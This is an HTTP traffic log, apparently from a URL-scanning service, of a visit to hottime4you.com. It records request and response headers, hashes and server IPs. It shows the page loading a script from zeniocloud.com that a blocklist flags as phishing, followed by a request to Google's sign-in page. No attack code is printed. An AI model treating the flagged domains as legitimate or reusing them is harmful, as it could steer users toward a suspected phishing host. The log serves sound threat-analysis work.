strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZWSdsHUnIAMFXtw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6338cabd-742d8a436403683e0cd9368f;Sampled=0
x-amzn-remapped-date: Sat, 01 Oct 2022 23:18:21 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 5sAzc5Ewv4g6Wqq6JJiLylG3Jyy_nlWrr5Oteeo6ebEgq7Rvss4XaQ==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Tue, 04 Oct 2022 04:42:53 GMT
age: 10983
etag: "58ff0bf8ce7528b303d28bab01a80ad721705569"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6315
Md5:    206fb65e75dbadf119512f71e0b78402
Sha1:   58ff0bf8ce7528b303d28bab01a80ad721705569
Sha256: 56c8d5f3b3060ee54bf81995269b86c070855d8c33bf437161339a45b309703f
                                        
GET /css?family=Quattrocento+Sans HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 07:45:54 GMT
date: Tue, 04 Oct 2022 07:45:54 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /JAIA.js?sub1=hottime4you.com HTTP/1.1
Host: zeniocloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
167.114.67.56
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.18.0 (Ubuntu)
date: Tue, 04 Oct 2022 07:45:55 GMT
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /v3/signin/identifier?dsh=S1728465341%3A1664869555910079&continue=https%3A%2F%2Flh3.google.com%2Fu%2F0%2Fd%2F1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQDHYWo4lWoJZtUxa6xluLoa-HBEwbqzVuiyH4jecC_Tbm9IR9DEKuHonBBjrkQHeOwhu4ogvQgp-w HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
216.58.207.237
HTTP/2 403 Forbidden
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Tue, 04 Oct 2022 07:45:55 GMT
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin
content-security-policy: script-src 'nonce-peZlyF0UF5LDvJeKwui_eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self', script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlist, require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
set-cookie: NID=511=gyXSs8_BHs-E50LXm5bqTUdKrlO-bzdHO_2fGknvrkcn4v3j6YyYiiiWUxiioltcOQVjvewWwP3QwHrujczC57OTcA_-pb3mzeoPLeuvlTPFAUa9Wasl_dXyXEwY_sm5gediDU-EwCXyWIhiemBPE76hS7yWUeRKyVsaixMv-jc; expires=Wed, 05-Apr-2023 07:45:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---